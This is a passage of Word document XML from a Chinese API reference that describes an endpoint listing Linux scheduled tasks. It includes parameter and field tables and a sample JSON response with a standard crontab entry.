          <w:p w14:paraId="7BFF20CE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="61B36978" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1330B292" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E3F5811" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F225386" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12EB233C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3CFF1450" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AE21508" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>execPath</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E4DB817" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="569BF836" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="388E0FC0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行命令或脚本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="21F911CC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20BB198E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>conf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44D023EB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FFEC536" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BE09676" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>配置文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="74266FDF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B2C8C5C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>taskTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="271189AE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>DateRange</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66DB8D2F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FC42E07" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="70FF4184" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="019EBA19" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>taskType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4155FCC4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1ACEC113" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08D1BAFD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>任务类型（仅CRONTAB/AT/BATCH三类）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0B815B58" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C99F224" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/assets/task/linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EB519B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A66AF8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total":1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentId": "fe107d9c77f4c77a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "displayIp": "192.168.78.131",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "connectionIp": "172.16.2.244",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "externalIp": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "internalIp": "192.168.78.131",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroupId": 41,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroup": "业务组a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "remark": "12345",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostTagList": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "标签a"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "xdu-vm-cent51",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "user": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "execTime": "47 6\t* * 7\t",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "execPath": "test -x /usr/sbin/anacron || ( cd / &amp;&amp; run-parts --report /etc/cron.weekly )",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "conf": "/etc/crontab",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "taskTime": "2016-04-06 05:59:09",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "taskId": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "crondOpen": true</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296286C2"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452"/>
        <w:gridCol w:w="1273"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="1594"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="5BC4573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3D89213" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6668B552" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A01037F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73F010E0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6FEBC14C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16538E5D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E89390A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="115DF167" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C02BBCE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agent uuid</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="26E25DE9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42637D4A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DCA634F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5850CF53" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F2E8649" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="02EEB05B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="553980BF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A0CF5B5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E3ADDD1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="335C9C8E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="43D5C3A6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19F05273" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3397D2E2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6281EF0F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DBCECD0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="298BE672" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7ABF9A35" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="238BDA78" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4748E0C5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51E3C1BA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5D66E814" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77147023" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="661EEEEA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BC07F1E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32D98242" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="10D7FB38" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FE239C1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>bizGroup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34CE8FEF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73749019" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59C90BD6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1479922E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48CD4B17" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06C69098" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AA5C587" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14978943" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="02DD2051" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16E9A317" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C225B8F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D1F4B3F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6496A8F8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4F4D9840" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="782D7E51" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0453E0CB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20E37D6D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="524F827B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="632A67D1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6ED6BAD8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3ECAEA61" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="098E5319" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3416A0FA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6163F064" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CDDA453" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>execTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DF5F778" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
